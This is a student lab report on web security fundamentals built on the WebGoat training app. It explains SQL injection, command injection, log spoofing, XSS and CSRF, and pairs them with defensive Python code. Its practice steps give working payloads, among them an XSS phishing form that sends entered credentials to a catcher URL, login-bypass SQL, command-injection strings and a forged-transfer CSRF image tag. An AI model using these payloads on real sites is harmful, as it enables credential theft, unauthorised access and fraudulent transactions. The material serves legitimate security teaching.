20165218 "Network Warfare Technology" Exp9 Web Security Fundamentals


Answers to the basic questions

SQL injection attacks and how to defend against them

SQL injection means inserting SQL commands into a web form field, a domain name or a page-request query string so that the server is tricked into executing malicious SQL.

An SQL injection attack exploits flaws in how the application builds and runs SQL statements on the target server. The main reason such attacks succeed is that user input is not validated before it is used to build SQL statements dynamically.

For example, a login routine usually runs a statement like "select id from users where username = '" + username + "' and password = '" + password + "'", where username and password are taken straight from the web form. If we type ' or 1=1-- into the username box, the statement actually executed becomes select id from users where username = '' or 1=1-- and password = ''. Since 1=1 is always true and the trailing and password = '' is commented out, the SQL check is skipped entirely.

That is the classic case. In this experiment, however, the page also limits the length of the input field and so on, so the corresponding page code has to be modified as well.

Defences against SQL injection attacks therefore include:

  • Close or remove unnecessary interactive form-submission pages;
  • Filter SQL keywords at the injection points in the relevant code and standardise secure coding practices;
  • Do not leave backup files on the server, since a backup that has been tampered with or that contains vulnerabilities gives an attacker a starting point.

Principle of XSS attacks and defence

An attacker exploits a vulnerable site (usually one that does not properly filter user input) to inject HTML code that is displayed on the page and affects other users. Because the victim's browser trusts the target server, when the victim visits the page into which the malicious script has been injected, the script executes successfully, letting the attacker obtain the user's cookie and perform unauthorised operations under the user's identity.

Browsers can recognise simple XSS attack strings and block simple XSS attacks; fundamentally, though, the solution is to remove the site's XSS vulnerabilities, which requires web developers to use measures such as escaping characters.

CSRF attacks and defence

CSRF stands for cross-site request forgery and XSS for cross-site scripting. They look similar and both belong to the cross-site family of attacks: the attacker does not attack the server itself, but the user's normal access to the site. As the name implies, CSRF forges requests, impersonating the user's normal operations on the site. The vast majority of sites identify users through cookies or similar means (including sites that use server-side sessions, since the session ID is mostly stored in a cookie) and then authorise them. So the best way to forge a user's normal operation is to use an XSS link or some other trick to make the user's own machine (that is, the browser that holds the identity cookie) send a request without the user knowing.

Strictly speaking, CSRF cannot be classified as an injection attack, because XSS injection is only one of many ways to achieve CSRF. CSRF is easy to achieve through XSS, but on a poorly designed website an ordinary link can cause CSRF as well.

Defences can be considered from the following angles:

  • Design the site's APIs so that operations which modify state, such as creating a post, accept only POST requests, while GET requests only retrieve pages and never change server-side resources.
  • Use a request token. First the server generates a random string according to some strategy as the token and stores it in the session. When the page is requested, the token is placed in a hidden form field and sent along with the other information. The page that receives the request compares the token it received with the one in the session and processes the request only when they match; otherwise it returns HTTP 403 to reject the request, or requires the user to log in again.
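The two defences above, POST-only state changes and a per-session request token, as an added example that is not WebGoat's or the report author's code. The session dictionary and the `handle_transfer` request handler are assumed stand-ins for a web framework's session store and route; the same check would stop the hidden `<img src=...transferFunds=5000>` request used in the CSRF practice section, since that request is a GET that carries no token.

```python
import hmac
import secrets

# Constructed stand-in for a server-side session store (assumption: a real
# application would take the session object from its web framework).
def new_session():
    return {}

def issue_csrf_token(session):
    """Called when rendering a state-changing form: create the token once per
    session, keep it server-side, and return it for the hidden field."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def render_transfer_form(session):
    token = issue_csrf_token(session)
    return (
        '<form method="POST" action="/transferFunds">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="amount"><input type="submit"></form>'
    )

def handle_transfer(session, method, form):
    """Returns the HTTP status the server would answer with: 405 for anything
    but POST (state changes are POST-only), 403 when the token is missing or
    does not match the session copy, 200 when the request is accepted."""
    if method != "POST":
        return 405
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so the check does not leak token bytes.
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403
    return 200
```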

Practice record

SQL injection attacks
Command Injection

A command injection vulnerability lets an attacker execute operating system commands without authorisation. It exists when the application fails to properly validate and sanitise the input it passes to shell functions; by controlling those parameters an attacker can trick the application into executing arbitrary system commands.
Principle: malicious code is added to a normal parameter during submission so that it is executed as an instruction.

  • In the left sidebar select Command Injection, right-click the page and choose Inspect Element to view and modify the page source
  • Find the check-box form and, in any list entry (here BackDoors.help), append "& netstat -an &ipconfig

  • Click View; the command output shows the network port usage and the IP address
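How the help-file parameter from this lesson can be handled so that the appended "& netstat -an &ipconfig" never reaches a shell, as an added example that is not WebGoat's code. The help directory path and the `HELP_NAME` allow-list pattern are assumptions for the demonstration.

```python
import re
import subprocess

# Allow only what the help-file field is meant to carry: a bare file name
# (assumed pattern) with no path separators and no shell metacharacters.
HELP_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")
HELP_DIR = "/var/www/help"   # assumed location of the help files

def validate_help_name(name):
    if not HELP_NAME.fullmatch(name) or ".." in name:
        raise ValueError("invalid help file name: %r" % name)
    return name

# Vulnerable pattern: the parameter is pasted into one shell command string,
# so 'BackDoors.help" & netstat -an & ipconfig' closes the quote and the
# shell runs the extra commands.
def build_vulnerable_command(name):
    return 'cat "' + HELP_DIR + "/" + name + '"'

# Hardened: a validated name placed in an argv list. Even if validation were
# skipped, '&' would be part of one argument, not a command separator,
# because no shell parses the list.
def build_safe_command(name):
    return ["cat", HELP_DIR + "/" + validate_help_name(name)]

def show_help(name):
    # shell=False is subprocess.run's default; the list is passed to execve.
    result = subprocess.run(build_safe_command(name),
                            capture_output=True, text=True)
    return result.stdout
```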

Numeric SQL Injection

Inject numeric data (e.g. an always-true expression) to achieve the injection.

  • In the left column choose Numeric SQL Injection, open Inspect Element, and append or 1=1 to the Value of the selected city number
  • The weather conditions of all cities are displayed
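Both injection cases from this report, the string login bypass with ' or 1=1 -- described in the answers section and used again in LAB: SQL Injection, and the numeric or 1=1 case above, beside their parameterised fixes, as an added example that is not WebGoat's code. The in-memory SQLite tables and their rows are constructed stand-ins for the lesson's users and weather data.

```python
import sqlite3

# Constructed stand-in for WebGoat's users and weather tables.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Larry Stooge', 'larry');
        CREATE TABLE weather(station INTEGER, city TEXT);
        INSERT INTO weather VALUES (101, 'Columbia'), (102, 'Seattle'),
                                   (103, 'New York');
    """)
    return db

# Vulnerable: the statement is built by concatenation, exactly like
# "select id from users where username = '" + username + "' and ...".
def login_vulnerable(db, username, password):
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in db.execute(sql)]

# Hardened: placeholders pass the input as a value, never as SQL syntax.
def login_safe(db, username, password):
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]

# Numeric injection: there are no quotes to break out of, so appending
# " or 1=1" to the station number is enough when it is concatenated.
def weather_vulnerable(db, station):
    return [row[0] for row in db.execute(
        "SELECT city FROM weather WHERE station = " + station)]

def weather_safe(db, station):
    # Reject anything that is not a plain integer before it reaches SQL,
    # then bind it as a parameter.
    if not station.isdigit():
        raise ValueError("station id must be numeric")
    return [row[0] for row in db.execute(
        "SELECT city FROM weather WHERE station = ?", (int(station),))]
```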

Log Spoofing

Achieved by inserting a spoofed entry into the log file. By fooling the human eye reading the log, an attacker can use this technique to hide their tracks.

  • Select Log Spoofing
  • In the Username field enter 5218%0d%0aLogin Succeeded for username: admin, using the carriage return (%0d) and line feed (%0a) so that a forged line appears in the log
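A log writer that neutralises the carriage return and line feed the lesson relies on, so the username above ends up as one log line instead of two, as an added example that is not WebGoat's code. The message format and the `capture_log` helper that returns the written line are assumptions for the demonstration.

```python
import io
import logging
import urllib.parse

def sanitize_log_field(value):
    """Replace CR, LF and other control characters in user-supplied text
    with a visible escape so one submitted value can never span or forge
    a second log line."""
    out = []
    for ch in value:
        if ord(ch) < 0x20 or ord(ch) == 0x7F:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)

def log_login_attempt(logger, raw_username, success):
    # The form field arrives URL-encoded; %0d%0a decodes to CR LF here.
    username = urllib.parse.unquote(raw_username)
    status = "Succeeded" if success else "Failed"
    logger.info("Login %s for username: %s", status,
                sanitize_log_field(username))

def capture_log(raw_username, success=False):
    """Returns exactly what would be written to the log for one attempt
    (constructed logger writing to a string buffer instead of a file)."""
    buf = io.StringIO()
    logger = logging.getLogger("webgoat.demo")
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(message)s"))
    logger.addHandler(handler)
    log_login_attempt(logger, raw_username, success)
    logger.removeHandler(handler)
    return buf.getvalue()
```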
LAB: SQL Injection
  • Select LAB: SQL Injection, open Inspect Element, and modify the page source
  • Change the maximum length of the password box to 30

  • Choose any login user (here the default, Larry Stooge), enter the password ' or 1=1 --, and the login succeeds

XSS attacks
Phishing with XSS

Cross-site scripting injects HTML to hijack the user's browser: it can place any HTML content into the page the user is currently viewing and simulate the current user's actions. The test here is an attack that obtains the user's name and password.

  • In the left column open Cross-Site Scripting (XSS), Phishing with XSS

  • Enter the following code in the search field
<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>
 
</div></div>
</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>
  • The code produces the green, red and blue div results, and beneath them the prompt "This feature requires account login:" with username and password boxes that are used to trick the user.

  • Enter a username and password in the login box and click login; the alert from the code pops up showing the stolen username and password.
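The escaping fix named in the XSS answer above, applied to this lesson's search field, as an added example that is not WebGoat's code: the phishing payload is rendered through the vulnerable echo and through html.escape, and a simple check shows which version still contains live markup. The result template and the `contains_active_markup` check are assumptions for the demonstration; `PHISH_PAYLOAD` is a shortened constructed form of the payload above.

```python
import html
import re

# Constructed stand-in for the lesson's search-results page.
RESULT_TEMPLATE = "<p>Results for: {term}</p>"

def render_vulnerable(term):
    # Echoes the input verbatim, so any markup in it becomes part of the page.
    return RESULT_TEMPLATE.format(term=term)

def render_escaped(term):
    # html.escape turns < > & " ' into entities; the browser shows them as
    # text instead of parsing them, so no form or script is created.
    return RESULT_TEMPLATE.format(term=html.escape(term, quote=True))

# Tags that carry script or submit/load data; used only to check what
# reached the page, not as a filter (escaping is the fix, this is the test).
ACTIVE_MARKUP = re.compile(r"<\s*(script|form|img|iframe)\b", re.I)

def contains_active_markup(page):
    return ACTIVE_MARKUP.search(page) is not None

# Constructed, shortened form of the lesson's phishing payload.
PHISH_PAYLOAD = (
    '</form><script>function hack(){alert("stolen")}</script>'
    '<form name="phish">Enter Username:<input name="user">'
    '<input type="submit" onclick="hack()"></form>'
)
```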

CSRF attacks
  • Open Cross-Site Scripting (XSS), Cross Site Request Forgery (CSRF)

  • In the Parameters shown on the right of the page, scr and menu are 497 and 900
  • Enter anything in Title, and in Message enter <img src="http://localhost:8080/WebGoat/attack?Screen=497&menu=900&transferFunds=5000" width="1" height="1" />
  • After submitting, a link with the Title name (news) appears in the Message List. Clicking the message loads and displays the news in the current page and transfers 5000 yuan out of the user's account, achieving the CSRF attack.


Origin www.cnblogs.com/zicerain/p/10926816.html